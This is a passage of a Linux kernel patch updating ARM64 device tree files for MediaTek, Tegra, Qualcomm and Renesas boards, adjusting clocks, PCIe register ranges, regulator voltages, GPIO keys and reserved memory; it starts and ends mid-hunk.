+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8195-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x100>;
+ 			#reset-cells = <1>;
+@@ -701,7 +707,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CLK26M_D2>;
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10024000 {
+@@ -1410,6 +1416,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges = <0 0 0x11e30000 0xe00>;
++			power-domains = <&spm MT8195_POWER_DOMAIN_SSUSB_PCIE_PHY>;
+ 			status = "disabled";
+ 
+ 			u2port1: usb-phy@0 {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+index a44c56c1e56e5..634373a423ef6 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+@@ -1666,7 +1666,7 @@
+ 		vin-supply = <&vdd_5v0_sys>;
+ 	};
+ 
+-	vdd_cam_1v2: regulator-vdd-cam-1v8 {
++	vdd_cam_1v2: regulator-vdd-cam-1v2 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vdd-cam-1v2";
+ 		regulator-min-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index a721cdd80489e..05b97b05d4462 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -137,7 +137,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb1_pipe_clk_src";
++				clock-output-names = "usb3phy_1_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -180,7 +180,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb0_pipe_clk_src";
++				clock-output-names = "usb3phy_0_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -197,9 +197,9 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_qmp0: phy@86000 {
+-			compatible = "qcom,ipq8074-qmp-pcie-phy";
+-			reg = <0x00086000 0x1c4>;
++		pcie_qmp0: phy@84000 {
++			compatible = "qcom,ipq8074-qmp-gen3-pcie-phy";
++			reg = <0x00084000 0x1bc>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges;
+@@ -213,15 +213,16 @@
+ 				      "common";
+ 			status = "disabled";
+ 
+-			pcie_phy0: phy@86200 {
+-				reg = <0x86200 0x16c>,
+-				      <0x86400 0x200>,
+-				      <0x86800 0x4f4>;
++			pcie_phy0: phy@84200 {
++				reg = <0x84200 0x16c>,
++				      <0x84400 0x200>,
++				      <0x84800 0x1f0>,
++				      <0x84c00 0xf4>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_0_pipe_clk";
++				clock-output-names = "pcie20_phy0_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -242,14 +243,14 @@
+ 			status = "disabled";
+ 
+ 			pcie_phy1: phy@8e200 {
+-				reg = <0x8e200 0x16c>,
++				reg = <0x8e200 0x130>,
+ 				      <0x8e400 0x200>,
+-				      <0x8e800 0x4f4>;
++				      <0x8e800 0x1f8>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_1_pipe_clk";
++				clock-output-names = "pcie20_phy1_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -750,9 +751,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x10300000 0x10300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>,   /* downstream I/O */
++				 <0x82000000 0 0x10220000 0x10220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -795,16 +796,18 @@
+ 		};
+ 
+ 		pcie0: pci@20000000 {
+-			compatible = "qcom,pcie-ipq8074";
++			compatible = "qcom,pcie-ipq8074-gen3";
+ 			reg = <0x20000000 0xf1d>,
+ 			      <0x20000f20 0xa8>,
+-			      <0x00080000 0x2000>,
++			      <0x20001000 0x1000>,
++			      <0x00080000 0x4000>,
+ 			      <0x20100000 0x1000>;
+-			reg-names = "dbi", "elbi", "parf", "config";
++			reg-names = "dbi", "elbi", "atu", "parf", "config";
+ 			device_type = "pci";
+ 			linux,pci-domain = <0>;
+ 			bus-range = <0x00 0xff>;
+ 			num-lanes = <1>;
++			max-link-speed = <3>;
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+@@ -812,9 +815,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x20300000 0x20300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>, /* downstream I/O */
++				 <0x82000000 0 0x20220000 0x20220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -832,28 +835,30 @@
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_S_CLK>,
+-				 <&gcc GCC_PCIE0_AHB_CLK>,
+-				 <&gcc GCC_PCIE0_AUX_CLK>;
+-
++				 <&gcc GCC_PCIE0_AXI_S_BRIDGE_CLK>,
++				 <&gcc GCC_PCIE0_RCHNG_CLK>;
+ 			clock-names = "iface",
+ 				      "axi_m",
+ 				      "axi_s",
+-				      "ahb",
+-				      "aux";
++				      "axi_bridge",
++				      "rchng";
++
+ 			resets = <&gcc GCC_PCIE0_PIPE_ARES>,
+ 				 <&gcc GCC_PCIE0_SLEEP_ARES>,
+ 				 <&gcc GCC_PCIE0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_MASTER_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_SLAVE_ARES>,
+ 				 <&gcc GCC_PCIE0_AHB_ARES>,
+-				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>;
++				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE0_AXI_SLAVE_STICKY_ARES>;
+ 			reset-names = "pipe",
+ 				      "sleep",
+ 				      "sticky",
+ 				      "axi_m",
+ 				      "axi_s",
+ 				      "ahb",
+-				      "axi_m_sticky";
++				      "axi_m_sticky",
++				      "axi_s_sticky";
+ 			status = "disabled";
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8953.dtsi b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+index 6b992a6d56c16..85a87d058f8ab 100644
+--- a/arch/arm64/boot/dts/qcom/msm8953.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+@@ -455,7 +455,7 @@
+ 			reg = <0x1000000 0x300000>;
+ 			interrupts = <GIC_SPI 208 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 155>;
++			gpio-ranges = <&tlmm 0 0 142>;
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
+index 7e6bce4af4410..4159fc35571a6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) Jean Thomas <virgule@jeanthomas.me>
++/*
++ * Copyright (c) Jean Thomas <virgule@jeanthomas.me>
+  */
+ 
+ /dts-v1/;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
+index e6a5ebd30e2f5..ad9702dd171be 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) Jean Thomas <virgule@jeanthomas.me>
++/*
++ * Copyright (c) Jean Thomas <virgule@jeanthomas.me>
+  */
+ 
+ /dts-v1/;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 71e373b11de9d..465b2828acbd4 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -1,7 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) 2015, LGE Inc. All rights reserved.
++/*
++ * Copyright (c) 2015, LGE Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2022, Dominik Kobinski <dominikkobinski314@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -13,6 +15,9 @@
+ /* cont_splash_mem has different memory mapping */
+ /delete-node/ &cont_splash_mem;
+ 
++/* disabled on downstream, conflicts with cont_splash_mem */
++/delete-node/ &dfps_data_mem;
++
+ / {
+ 	model = "LG Nexus 5X";
+ 	compatible = "lg,bullhead", "qcom,msm8992";
+@@ -47,7 +52,17 @@
+ 		};
+ 
+ 		cont_splash_mem: memory@3400000 {
+-			reg = <0 0x03400000 0 0x1200000>;
++			reg = <0 0x03400000 0 0xc00000>;
++			no-map;
++		};
++
++		reserved@5000000 {
++			reg = <0x0 0x05000000 0x0 0x1a00000>;
++			no-map;
++		};
++
++		reserved@6c00000 {
++			reg = <0x0 0x06c00000 0x0 0x400000>;
+ 			no-map;
+ 		};
+ 	};
+@@ -79,8 +94,8 @@
+ 		/* S1, S2, S6 and S12 are managed by RPMPD */
+ 
+ 		pm8994_s1: s1 {
+-			regulator-min-microvolt = <800000>;
+-			regulator-max-microvolt = <800000>;
++			regulator-min-microvolt = <1025000>;
++			regulator-max-microvolt = <1025000>;
+ 		};
+ 
+ 		pm8994_s2: s2 {
+@@ -236,9 +251,8 @@
+ 		};
+ 
+ 		pm8994_l26: l26 {
+-			/* TODO: value from downstream
+ 			regulator-min-microvolt = <987500>;
+-			fails to apply */
++			regulator-max-microvolt = <987500>;
+ 		};
+ 
+ 		pm8994_l27: l27 {
+@@ -252,19 +266,13 @@
+ 		};
+ 
+ 		pm8994_l29: l29 {
+-			/* TODO: Unsupported voltage range.
+ 			regulator-min-microvolt = <2800000>;
+ 			regulator-max-microvolt = <2800000>;
+-			qcom,init-voltage = <2800000>;
+-			*/
+ 		};
+ 
+ 		pm8994_l30: l30 {
+-			/* TODO: get this verified
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+-			qcom,init-voltage = <1800000>;
+-			*/
+ 		};
+ 
+ 		pm8994_l31: l31 {
+@@ -273,11 +281,8 @@
+ 		};
+ 
+ 		pm8994_l32: l32 {
+-			/* TODO: get this verified
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+-			qcom,init-voltage = <1800000>;
+-			*/
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8992.dtsi b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+index f4be09fc1b151..02fc3795dbfd7 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
++/*
++ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
+  */
+ 
+ #include "msm8994.dtsi"
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+index ca7c8d2e1d3d9..a60decd894291 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+@@ -944,10 +944,6 @@
+ 	};
+ };
+ 
+-/*
+- * For reasons that are currently unknown (but probably related to fusb301), USB takes about
+- * 6 minutes to wake up (nothing interesting in kernel logs), but then it works as it should.
+- */
+ &usb3 {
+ 	status = "okay";
+ 	qcom,select-utmi-as-pipe-clk;
+@@ -956,6 +952,7 @@
+ &usb3_dwc3 {
+ 	extcon = <&usb3_id>;
+ 	dr_mode = "peripheral";
++	maximum-speed = "high-speed";
+ 	phys = <&hsusb_phy1>;
+ 	phy-names = "usb2-phy";
+ 	snps,hird-threshold = /bits/ 8 <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 1107befc3b091..c103034372fd7 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -712,7 +712,7 @@
+ 			#power-domain-cells = <1>;
+ 			reg = <0x00300000 0x90000>;
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>,
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+ 				 <&rpmcc RPM_SMD_LN_BB_CLK>,
+ 				 <&sleep_clk>,
+ 				 <&pciephy_0>,
+@@ -829,9 +829,11 @@
+ 			compatible = "qcom,msm8996-a2noc";
+ 			reg = <0x00583000 0x7000>;
+ 			#interconnect-cells = <1>;
+-			clock-names = "bus", "bus_a";
++			clock-names = "bus", "bus_a", "aggre2_ufs_axi", "ufs_axi";
+ 			clocks = <&rpmcc RPM_SMD_AGGR2_NOC_CLK>,
+-				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>;
++				 <&rpmcc RPM_SMD_AGGR2_NOC_A_CLK>,
++				 <&gcc GCC_AGGRE2_UFS_AXI_CLK>,
++				 <&gcc GCC_UFS_AXI_CLK>;
+ 		};
+ 
+ 		mnoc: interconnect@5a4000 {
+@@ -1050,7 +1052,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -1118,7 +1120,7 @@
+ 				#clock-cells = <1>;
+ 				#phy-cells = <0>;
+ 
+-				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_BB_CLK1>;
++				clocks = <&mmcc MDSS_AHB_CLK>, <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 				clock-names = "iface", "ref";
+ 				status = "disabled";
+ 			};
+@@ -2932,8 +2934,8 @@
+ 			compatible = "qcom,msm8996-apcc";
+ 			reg = <0x06400000 0x90000>;
+ 
+-			clock-names = "xo";
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clock-names = "xo", "sys_apcs_aux";
++			clocks = <&rpmcc RPM_SMD_XO_A_CLK_SRC>, <&apcs_glb>;
+ 
+ 			#clock-cells = <1>;
+ 		};
+@@ -3052,7 +3054,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
+ 				<&gcc GCC_SDCC1_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC1_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3076,7 +3078,7 @@
+ 			clock-names = "iface", "core", "xo";
+ 			clocks = <&gcc GCC_SDCC2_AHB_CLK>,
+ 				<&gcc GCC_SDCC2_APPS_CLK>,
+-				<&rpmcc RPM_SMD_BB_CLK1>;
++				<&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			resets = <&gcc GCC_SDCC2_BCR>;
+ 
+ 			pinctrl-names = "default", "sleep";
+@@ -3383,7 +3385,7 @@
+ 			interrupt-names = "wdog", "fatal", "ready",
+ 					  "handover", "stop-ack";
+ 
+-			clocks = <&rpmcc RPM_SMD_BB_CLK1>;
++			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>;
+ 			clock-names = "xo";
+ 
+ 			memory-region = <&adsp_mem>;
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index a7ec9d11946df..f0d256d99e62e 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -16,8 +16,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8350_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/qcom/qcs404.dtsi b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+index 80f2d05595fa6..bec1b6e5a67ac 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404.dtsi
+@@ -792,7 +792,7 @@
+ 
+ 			clocks = <&gcc GCC_PCIE_0_PIPE_CLK>;
+ 			resets = <&gcc GCC_PCIEPHY_0_PHY_BCR>,
+-				 <&gcc 21>;
++				 <&gcc GCC_PCIE_0_PIPE_ARES>;
+ 			reset-names = "phy", "pipe";
+ 
+ 			clock-output-names = "pcie_0_pipe_clk";
+@@ -1322,12 +1322,12 @@
+ 				 <&gcc GCC_PCIE_0_SLV_AXI_CLK>;
+ 			clock-names = "iface", "aux", "master_bus", "slave_bus";
+ 
+-			resets = <&gcc 18>,
+-				 <&gcc 17>,
+-				 <&gcc 15>,
+-				 <&gcc 19>,
++			resets = <&gcc GCC_PCIE_0_AXI_MASTER_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_SLAVE_ARES>,
++				 <&gcc GCC_PCIE_0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE_0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE_0_BCR>,
+-				 <&gcc 16>;
++				 <&gcc GCC_PCIE_0_AHB_ARES>;
+ 			reset-names = "axi_m",
+ 				      "axi_s",
+ 				      "axi_m_sticky",
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 58976a1ba06be..b16886f715179 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3238,8 +3238,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 			cell-index = <0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 4cdc88d339445..516e70bf04ce9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -4242,8 +4242,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 146a4285c3952..ba684d980cf26 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1287,6 +1287,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_PRIM_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_PRIM_BCR>;
+ 
+@@ -1341,6 +1342,7 @@
+ 					  "ss_phy_irq";
+ 
+ 			power-domains = <&gcc USB30_SEC_GDSC>;
++			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			resets = <&gcc GCC_USB30_SEC_BCR>;
+ 
+@@ -1470,8 +1472,8 @@
+ 			interrupts-extended = <&pdc 1 IRQ_TYPE_LEVEL_HIGH>;
+ 			qcom,ee = <0>;
+ 			qcom,channel = <0>;
+-			#address-cells = <1>;
+-			#size-cells = <1>;
++			#address-cells = <2>;
++			#size-cells = <0>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <4>;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index a3e15dedd60cb..c289bf0903b45 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -969,7 +969,7 @@
+ 	};
+ 
+ 	wcd_intr_default: wcd_intr_default {
+-		pins = <54>;
++		pins = "gpio54";
+ 		function = "gpio";
+ 
+ 		input-enable;
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index 6a8b88cc43853..e1ab5b5189949 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -40,17 +40,18 @@
+ 	};
+ 
+ 	gpio-keys {
+-		status = "okay";
+ 		compatible = "gpio-keys";
+-		autorepeat;
+ 
+-		key-vol-dn {
++		pinctrl-0 = <&vol_down_n>;
++		pinctrl-names = "default";
++
++		key-volume-down {
+ 			label = "Volume Down";
+ 			gpios = <&tlmm 47 GPIO_ACTIVE_LOW>;
+-			linux,input-type = <1>;
+ 			linux,code = <KEY_VOLUMEDOWN>;
+-			gpio-key,wakeup;
+ 			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -108,6 +109,14 @@
+ 
+ &tlmm {
+ 	gpio-reserved-ranges = <22 2>, <28 6>;
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio47";
++		function = "gpio";
++		drive-strength = <2>;
++		bias-disable;
++		input-enable;
++	};
+ };
+ 
+ &usb3 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6125.dtsi b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+index 7818fb6c5a10a..271247b371759 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6125.dtsi
+@@ -442,9 +442,9 @@
+ 			reg = <0x01613000 0x180>;
+ 			#phy-cells = <0>;
+ 
+-			clocks = <&rpmcc RPM_SMD_XO_CLK_SRC>,
+-				 <&gcc GCC_AHB2PHY_USB_CLK>;
+-			clock-names = "ref", "cfg_ahb";
++			clocks = <&gcc GCC_AHB2PHY_USB_CLK>,
++				 <&rpmcc RPM_SMD_XO_CLK_SRC>;
++			clock-names = "cfg_ahb", "ref";
+ 
+ 			resets = <&gcc GCC_QUSB2PHY_PRIM_BCR>;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 7be5fc8dec671..35f621ef9da54 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -342,13 +342,12 @@
+ 		};
+ 
+ 		ramoops: ramoops@ffc00000 {
+-			compatible = "removed-dma-pool", "ramoops";
+-			reg = <0 0xffc00000 0 0x00100000>;
++			compatible = "ramoops";
++			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			ftrace-size = <0x0>;
+ 			msg-size = <0x20000 0x20000>;
+-			cc-size = <0x0>;
++			ecc-size = <16>;
+ 			no-map;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index fb6e5a140c9f6..04c71f74ab72d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -33,9 +33,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* Griffin BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's (going to be) a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index a6270d97a3192..ca7c428a741d4 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1043,8 +1043,6 @@
+ 				interrupts = <GIC_SPI 604 IRQ_TYPE_LEVEL_HIGH>;
+ 				power-domains = <&rpmhpd SM8350_CX>;
+ 				operating-points-v2 = <&qup_opp_table_100mhz>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 32a37c878a34c..df0d888ffc008 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -991,8 +991,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart20_default>;
+ 				interrupts = <GIC_SPI 587 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1387,8 +1385,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart7_tx>, <&qup_uart7_rx>;
+ 				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+index 8166e3c1ff4e5..cafde91b4721b 100644
+--- a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
++++ b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+@@ -437,20 +437,6 @@
+ 		};
+ 	};
+ 
+-	/* 0 - lcd_reset */
+-	/* 1 - lcd_pwr */
+-	/* 2 - lcd_select */
+-	/* 3 - backlight-enable */
+-	/* 4 - Touch_shdwn */
+-	/* 5 - LCD_H_pol */
+-	/* 6 - lcd_V_pol */
+-	gpio_exp1: gpio@20 {
+-		compatible = "onnn,pca9654";
+-		reg = <0x20>;
+-		gpio-controller;
+-		#gpio-cells = <2>;
+-	};
+-
+ 	touchscreen@26 {
+ 		compatible = "ilitek,ili2117";
+ 		reg = <0x26>;
+@@ -482,6 +468,16 @@
+ 			};
+ 		};
+ 	};
++
++	gpio_exp1: gpio@70 {
++		compatible = "nxp,pca9538";
++		reg = <0x70>;
++		gpio-controller;
++		#gpio-cells = <2>;
